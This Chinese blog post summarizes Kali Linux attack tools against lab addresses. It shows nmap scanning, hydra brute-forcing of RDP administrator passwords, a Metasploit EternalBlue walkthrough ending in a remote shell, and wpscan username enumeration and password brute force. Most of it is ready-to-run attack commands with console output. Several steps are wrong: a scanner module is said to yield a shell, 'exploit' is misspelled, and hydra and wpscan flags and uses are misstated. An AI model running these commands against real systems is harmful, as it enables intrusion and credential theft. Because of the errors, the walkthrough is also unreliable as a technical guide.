kali常用软件-总结

kali里常用的软件

1.nmap 信息收集

nmap   -sP  192.168.71.0/24  #ping扫描192.168.71.0这个网段的存活主机

nmap  -A 192.168.71.141  -p-   -oN nmap-a.txt # 收集192.168.71.141这台机器的信息。并保存在当前目录的nmap-a.txt

 

2.hydra 密码爆破

密码字典的位置可以自己总结。也可以用kali自带的。

路径:/usr/share/wordlist

========

root@kali:/usr/share/wordlists# ls
dirb       fasttrack.txt  metasploit  rockyou.txt.gz
dirbuster  fern-wifi      nmap.lst    wfuzz
 

========

 hydra rdp://192.168.71.141 -l administrator -P password.dic  -vV -t 50  -e nsr -f -o rdp.txt

 参数介绍:

-l 后面跟要爆破用户名

-L  后面跟用户名字典

-p  后面跟密码

-P 后面跟密码字典

-vV  查看爆破过程,可以不加

-t  为了加快爆破速度。开多少线程。,可以不加

-e  有3个参数可以家。n =密码为空,s =密码跟用户名一样。r=密码是用户名反过来写的,可以不加

-f  爆破后就停止 ,可以不加

-oN  后面跟保存的路径

 

 

3.metasploit framwork 漏洞测试框架

msfconsole

#以 巨硬公司永恒之蓝为案例


1.msfconsole
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 > 
msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads


set rhost 192.168.71.141
set thread  100
expoloit 

shell

 #已经进入了192.168.71.141的系统了

 

 

4. wpscan  测试wordpress的工具。

  wpscan  192.168.71.161 >  password.dic  #生成密码字典

   wpscan  --url  192.168.71.161 -e u  >username.dic# 查找用户名 

  wpscan --url 192.168.71.161 -U username.dic -P password.dic #尝试爆破密码

 

你可能感兴趣的:(渗透测试,渗透测试,kali常用软件)